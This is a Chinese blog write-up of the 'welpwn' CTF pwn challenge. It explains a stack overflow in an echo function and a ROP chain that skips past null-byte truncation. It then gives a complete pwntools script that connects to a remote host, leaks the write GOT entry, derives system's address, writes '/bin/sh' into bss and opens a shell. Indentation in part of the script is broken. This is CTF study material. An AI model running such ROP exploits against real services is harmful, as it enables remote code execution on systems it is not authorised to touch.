rois welpwn -xman

最新推荐文章于 2024-05-09 09:32:40 发布
最新推荐文章于 2024-05-09 09:32:40 发布
阅读量819 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014281987/article/details/52343581
版权

echo 函数有栈溢出,把之前read的字符串复制到栈里,可素64位rop指令有00,所以根据echo函数逻辑,一个pop之类的后面的ret就覆盖不了,rop到此为止。不过看看main,木有截断哦,所以ppppr = 0x40089c这个就是为了把之前main栈里的24个a和一个pppr弹出来,接着不就可以之后写个ret,继续构造rop了吗!所以利用上一个栈桢是很有用滴,比如robot那个构造递归调用读取上面栈桢同flag的值

神器是DynELF,据说只需要写个leak,把某地址的内容读出来就行。通过此方法可以不需要libc!!! leak每次把流程返回到main,就可以重新rop出地址的内容,据说栈用太多会出问题,所以没事就要pop下栈,然而并不知道何时pop,所以改天还是得问问

另,rop的精髓就在于ret地址保存在栈上,所以一个ret可以接着一个ret

这里面一个坑点在于printf自己木有\n木有缓冲,于是回到main函数遇到fflush(如果fd=null,把输出全flush)才回把之前的24个a和pppr打出来,因此接收地址时要注意。


输出函数缓冲小知识链接

http://www.pixelbeat.org/programming/stdio_buffering/



from pwn import *
#sock1 = process('./welpwn')
sock1=remote('218.2.197.235',21032)
elf=ELF('welpwn')
got_write=elf.got['write']
got_read=elf.got['read']
pppppr=0x400896
mv=0x400880
bss_start = 0x601060
poprdi = 0x004008a3
ppppr = 0x40089c
puts_plt = 0x4005A0
main = 0x4007CD
flag=True
def leak(addr):
    global flag
    print sock1.recvuntil("RCTF\n")
    rop=p64(pppppr)+p64(0)+p64(0)+p64(1)+p64(got_write)+p64(8)+p64(addr)+p64(1)+p64(mv)+'A'*56+p64(main)
    sock1.sendline('A'*24 + p64(ppppr) + rop)
    
    
    print "send:"
    if flag:
      d=sock1.recv(8)
      
  flag=False
    else:
  print sock1.recv(0x1b)
  d=sock1.recv(8)
    return d
    


 
    


d=leak(got_write)
print "write:"+hex(u64(d))
#d = DynELF(leak, elf=ELF('./welpwn'))
#system = d.lookup('system', 'libc')
offset=-0xa6100
system=u64(d)+offset
print 'system address:'+hex(system)
#gets = d.lookup('gets', 'libc')


rop1 = p64(pppppr)+p64(0)+p64(0)+p64(1)+p64(got_read)+p64(16)+p64(bss_start)+p64(0)+p64(mv)+'A'*56+p64(main)


sock1.recvuntil('F\n')
sock1.sendline('A'*24 + p64(ppppr) + rop1)


sock1.send('/bin/sh\0')
sock1.send(p64(system))






rop2 = p64(pppppr)+p64(0)+p64(0)+p64(1)+p64(bss_start+8)+p64(0)+p64(0)+p64(bss_start)+p64(mv)+'A'*56+p64(main)
sock1.recvuntil('F\n')
sock1.sendline('A'*24 + p64(ppppr) + rop2)






sock1.interactive()

lulu_ctf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍 修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。 产品特点 自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。 2.19、2.23-2.29 32位和64位 调试增强(支持PIE )。 符号 断点 杂项 libc-database one_gadget 堆? 好吧,不支持堆分析。 但是我有一个给你的礼物。 安装 您有两种使用welpwn 。 通过安装 从0.9.3版本开始已添加setup.py 。
[攻防世界]-welpwn
m0_55906008的博客
12-05 545
pwn
探索黑客艺术:welpwn —— 一键破解的利器
最新发布
gitblog_00009的博客
05-09 316
探索黑客艺术:welpwn —— 一键破解的利器 项目地址:https://gitcode.com/matrix1001/welpwn 在黑客世界中,编程技巧和漏洞利用的艺术并存。今天,我们要向您推荐一款能简化这一过程的强大工具——welpwn。它是一个自动化神器,让您的pwnning技巧如虎添翼。 项目简介 welpwn是为那些追求高效破解的开发者设计的,它的目标是为您处理繁琐的工作,让您专注于...
攻防世界PWN之stackoverflow(栈溢出盲打)题解
seaaseesa的博客
01-28 1870
Stackoverflow 这题,没有提供给我们二进制文件,仅仅有一个可交互的地址。由题意也可以知道,它存在栈溢出。这是一个栈溢出盲打的题目。 首先,就是确定栈溢出的长度 我们发现,当我们输入23个整数后,就发生了溢出报错,同时,我们也知道了,这个程序开启了canary机制,这正好被我们利用起来判断栈溢出的长度。 接下来,就是泄露栈数据了,主要依靠功能3,它会把数组里的数据相邻的去重后...
CTF Blind pwn题型学习笔记
lifanxin的博客
08-31 1874
Blind pwn概述如何辨别漏洞类型逻辑漏洞盲打格式化字符串盲打原理阐述例题讲解axb_2019_fmt32栈溢出盲打堆盲打总结 概述   所谓Blind pwn,即是在无法获得二进制程序文件的情况下对题目进行漏洞利用。这篇博客主要是将见到过的盲打pwn题做一个总结,大概可以分为以下几类盲打pwn题:逻辑漏洞盲打、格式化字符串盲打、栈溢出盲打、堆盲打。 如何辨别漏洞类型   对于盲打题,首先第一步应该是判断属于哪种类型的盲打,判断的步骤也很简单,nc连上后,直接看程序提供的菜单功能。   一般来说,需要逻
格式化字符串类盲pwn的dump方法
weixin_46483787的博客
04-11 592
有一类题目,不会给任何文件,只给一个ip和端口,这种称为blind pwn(盲pwn),如果这类pwn存在格式化字符串漏洞的话,可以通过一些手法拿到整个二进制程序,这对我们的逆向分析和解题是十分重要的,举个例子: 在2022年的Insomni’hack teaser比赛上,有一道题CovidLe$s,就是一道盲pwn,输入什么就回显什么,但是存在格式化字符串漏洞,并且应该是栈上的,通过不断的尝试是可以大致猜测出栈结构的: 从偏移12开始是栈上的缓冲区,29那里是canary,31是返回地址,根据后三位可以
roisin-spring:用于分析临床数据的 Roisin Web 应用程序
06-05
服务器部署完成 roisin-settings.properties 文件将上述文件复制到 CATALINA_HOME
mmROI (Multiple Images with Multiple ROIs):打开多张图片,预制多个ROIs流程-matlab开发
06-01
1) 目标:交互式处理具有多个 ROI(所谓的 mmROI)的多个图像,返回 ROI 均值、标准、最小值、最大值、中值、面积和中心(X,Y),并沿图像绘制均值/标准值系列。 2)用法:[roi, im] = mmROI;...
les-rois-de-la-pedale:原创项目 MAIL MASTER 2 IF 应用
06-21
踏板之王原始项目 MAIL MASTER 2 IF 应用程序。
matlab图片叠加的代码-Drawing-ROIs-without-GUI:使用非图形用户界面绘制投资回报率
05-23
matlab图片叠加的代码在没有GUI的情况下绘制ROI 在Matlab中使用非图形用户界面绘制ROI 分析钙成像数据时,绘制ROI是一项重复性的任务。 尽管进行了自动化尝试(例如),但大多数时候手动绘制ROI仍是最佳解决方案。...
le-livre-des-rois:列王记-Shâhnâmeh
04-17
!!! 我正在寻找一位Web设计师,以创造更好的用户体验,并寻找一位艺术家,以插图/绘图代替照片。 随时在自我介绍!!!费多西(Ferdowsi)波斯国王的传奇历史。 从远古时代就有一本书,其中写了许多故事。...
welpwn pwn 入门题
02-11
pwn 入门题
攻防世界高手进阶区 ——Welpwn
weixin_62675330的博客
03-21 830
攻防世界高手进阶区 ——Welpwn 分析文件 checksec分析 coke@ubuntu:~/桌面/CTFworkstation/OADW/welpwn$ checksec welpwn [*] '/home/coke/桌面/CTFworkstation/OADW/welpwn/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX e
welpwn(xctf)
weixin_43868725的博客
06-15 233
0x0 程序保护和流程 保护: 流程: main() echo() echo函数中存在明显的栈溢出漏洞。 0x1 利用过程 使用x64的通用gadget,泄露write函数的地址。使用LibcSearcher查出相应的libc,得到system函数和/bin/sh字符串的地址就可以getshell了。但是理想是丰满的现实是骨感的,exp写完后一直报错。用GDB查看一下core。发现确实覆盖了返回地址但是后面紧接着是输入缓冲区中的数据。回过去看echo函数,发现在写入s2的时候/x00会被截断,这种截断
【Pwn】wp
weixin_52553215的博客
11-22 703
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
welpwn(RCTF-2015)--write up
ATFWUS的博客
03-12 905
文件下载地址: 链接:https://pan.baidu.com/s/1MG2z9r4wz_WTEz1vIikqJQ 提取码:3tbc 0x01.分析 checksec: 源码分析: 流程非常简单,首先输入一个1024大小字符串,然后进入函数echo,这个函数会将buf的数据一个字节一个字节的复制到s2中,...
XCTF warmup
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-10 1113
这题没有二进制文件 最简单的一个盲打pwn题 。虽然难的题目我还不会 只有一个ip和一个端口 nc连接上去看看 发现程序会给我们返回一个地址 猜测这个地址就是后门函数的地址 写了个爆破程序 from pwn import * def blast(ip,port,padd_start,padd_end,addr): for i in range(padd_start,padd_end): ...
DOSBOX中debug常用指令的使用
热门推荐
weixin_47586883的博客
10-22 1万+
仅作为个人学习笔记 挂在文件这些操作就不说了吧,一张图就够了 进入虚拟c盘,输入debug。 接下来先了解一下常用的一些debug中的命令。(命令不区分大小写) 一、查看、修改CPU中寄存器的内容:R命令。 1.直接输入r,查看寄存器中的内容: 2.改变寄存器中的内容: 可以观察到ax中的内容由0000改变成了ab23。 二、查看内存中的内容:D命令。 1.直接输入d,可以查看预设地址内存处的128个字节的内容: 输入r查看的内容中最下面一行就是当前所在的地址,即073f:0100,再输入d查看的就
subset data from rois
09-18
Subset data from rois是指从感兴趣区域(ROIs)中获取子集数据。ROIs是指在数据集中定义的特定区域,可能是在图像、地图、生物学等领域中使用的感兴趣区域。 获取ROIs的子集数据通常涉及以下步骤: 首先,我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值